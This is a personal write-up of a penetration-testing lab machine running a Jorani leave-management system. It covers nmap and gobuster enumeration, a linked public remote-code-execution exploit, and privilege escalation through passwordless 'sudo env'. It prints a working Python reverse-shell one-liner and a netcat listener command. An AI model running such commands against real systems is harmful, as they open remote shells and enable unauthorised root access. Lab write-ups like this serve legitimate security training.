Whenever we are in a pentest, there is things we have to take into consideration while infiltrating a machine or exploiting it’s services. there is also different entry points to the target whether it’s a misconfigured access control or a vulnerabilty of some sort.

Moving forward, the first step in a red team pentest is the following:

Information gathering, by that I’ll leverage the tools to gather as much information about the target as possible to later use those info to get access on the system.

Always when we want to see if the target is up and running we send ICMP Requests to see if it’s live and online:

Next I’ll run a quick scan with nmap :

└─# nmap -sC -sV 192.168.122.109 -oA initial -v

Next I’ll run a full scan with nmap :

└─# nmap -p- -sC -sV 192.168.122.109 -oA full -v

Afterwards I’ll run a enumeration scan to find web directories that could help us to further explore the target:

`└─# gobuster dir -u http://192.168.122.109 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --exclude-length 0 -o enum.txt`

from the nmap scan I found the following directory:

/evox/about

from navigating to the webpage I found the following page:

Leave Management system:

on the bottom right corner there is a version number for the jorani CMS :

after some researching online I found the following exploit for the vulnerability :

https://pentest-tools.com/vulnerabilities-exploits/jorani-100-remote-code-execution_1842

Running the exploit against the target got me initial access:

I noticed while I was examining the target’s shell that the environment is running Pseudo-term, the next move will be to stabilize the shell so I can execute commands freely, first I would run a listener in another terminal:

nc -lnvp 9001

Afterwards I’ll run this command with python to get a better reverse shell:

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

And there we go a shell was recieved:

Next I’ll run sudo -l to see if there is any possible PE vector with sudo :

Apparently I can run /usr/bin/env as Sudo without password, this might be a strong sign that I can escalate privileges with env, next I’ll navigate to gtfobins and check if there is any executions i can run with env:

by running sudo env /bin/sh I can successfully get root access on the box!!!
voila :)

Thank you all for reading my writeups and supporting my content till now, I appreciate everyone of you, currently I’m between jobs and preparing for OSCP slowly for the long term, for a better career and for a better future! if you like my content and would like to follow this inspiring journey please clap my content as much as possible, follow me and share my articles if you like them, it really means alot and keeps pushing me further to greatness.

Happy hacking!